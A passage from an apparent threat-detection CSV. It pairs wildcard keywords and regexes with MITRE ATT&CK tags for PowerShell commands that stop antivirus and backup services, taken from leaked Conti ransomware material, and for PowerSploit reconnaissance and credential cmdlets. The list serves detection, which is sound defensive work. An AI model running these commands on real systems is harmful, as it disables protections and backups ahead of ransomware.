services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$VEEAMSQL*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$VEEAMSQL.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name sacsvr*",".{0,1000}Stop\-Process\s\-Name\ssacsvr.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name SAVAdminService*",".{0,1000}Stop\-Process\s\-Name\sSAVAdminService.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name SAVService*",".{0,1000}Stop\-Process\s\-Name\sSAVService.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name shadowprotectsvc*",".{0,1000}Stop\-Process\s\-Name\sshadowprotectsvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name 
ShMonitor*",".{0,1000}Stop\-Process\s\-Name\sShMonitor.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name Smcinst*",".{0,1000}Stop\-Process\s\-Name\sSmcinst.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name SmcService*",".{0,1000}Stop\-Process\s\-Name\sSmcService.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name sms_site_sql_backup*",".{0,1000}Stop\-Process\s\-Name\ssms_site_sql_backup.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name SntpService* ",".{0,1000}Stop\-Process\s\-Name\sSntpService.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name sophossps*",".{0,1000}Stop\-Process\s\-Name\ssophossps.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name spxservice*",".{0,1000}Stop\-Process\s\-Name\sspxservice.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name sqbcoreservice*",".{0,1000}Stop\-Process\s\-Name\ssqbcoreservice.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name SQLAgent$SOPH",".{0,1000}Stop\-Process\s\-Name\sSQLAgent\$SOPH","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name 
SQLAgent$VEEAMSQL*",".{0,1000}Stop\-Process\s\-Name\sSQLAgent\$VEEAMSQL.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name SQLAgent$VEEAMSQL*",".{0,1000}Stop\-Process\s\-Name\sSQLAgent\$VEEAMSQL.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name stc_endpt_svc*",".{0,1000}Stop\-Process\s\-Name\sstc_endpt_svc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name stop SepMasterService*",".{0,1000}Stop\-Process\s\-Name\sstop\sSepMasterService.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name svcGenericHost*",".{0,1000}Stop\-Process\s\-Name\ssvcGenericHost.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name swi_filter*",".{0,1000}Stop\-Process\s\-Name\sswi_filter.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name swi_service*",".{0,1000}Stop\-Process\s\-Name\sswi_service.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name swi_update*",".{0,1000}Stop\-Process\s\-Name\sswi_update.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name swi_update_64*",".{0,1000}Stop\-Process\s\-Name\sswi_update_64.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name 
TmCCSF*",".{0,1000}Stop\-Process\s\-Name\sTmCCSF.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name tmlisten*",".{0,1000}Stop\-Process\s\-Name\stmlisten.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name TrueKey*",".{0,1000}Stop\-Process\s\-Name\sTrueKey.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name TrueKeyScheduler* ",".{0,1000}Stop\-Process\s\-Name\sTrueKeyScheduler.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name TrueKeyServiceHel",".{0,1000}Stop\-Process\s\-Name\sTrueKeyServiceHel","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name vapiendpoint* ",".{0,1000}Stop\-Process\s\-Name\svapiendpoint.{0,1000}\s\s\s\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamBackupSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamBackupSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamBrokerSvc *",".{0,1000}Stop\-Process\s\-Name\sVeeamBrokerSvc\s.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamCatalogSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamCatalogSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" 
"*Stop-Process -Name VeeamCloudSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamCloudSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamDeploymentService*",".{0,1000}Stop\-Process\s\-Name\sVeeamDeploymentService.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamDeploySvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamDeploySvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamDeploySvc* ",".{0,1000}Stop\-Process\s\-Name\sVeeamDeploySvc.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamEnterpriseManagerSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamEnterpriseManagerSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamHvIntegrationSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamHvIntegrationSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamMountSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamMountSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamNFSSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamNFSSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamRESTSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamRESTSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name VeeamTransportSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamTransportSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name vsnapvss*",".{0,1000}Stop\-Process\s\-Name\svsnapvss.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name vssvc*",".{0,1000}Stop\-Process\s\-Name\svssvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name wbengine*",".{0,1000}Stop\-Process\s\-Name\swbengine.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name 
wbengine*",".{0,1000}Stop\-Process\s\-Name\swbengine.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name WRSVC*",".{0,1000}Stop\-Process\s\-Name\sWRSVC.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Get-NetForestCatalog*",".{0,1000}Get\-NetForestCatalog.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetForestDomain*",".{0,1000}Get\-NetForestDomain.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetForestTrust*",".{0,1000}Get\-NetForestTrust.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetSession*",".{0,1000}Get\-NetSession.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetShare*",".{0,1000}Get\-NetShare.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetSubnet*",".{0,1000}Get\-NetSubnet.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-RegistryAutoLogon*",".{0,1000}Get\-RegistryAutoLogon.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-SiteListPassword*",".{0,1000}Get\-SiteListPassword.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an 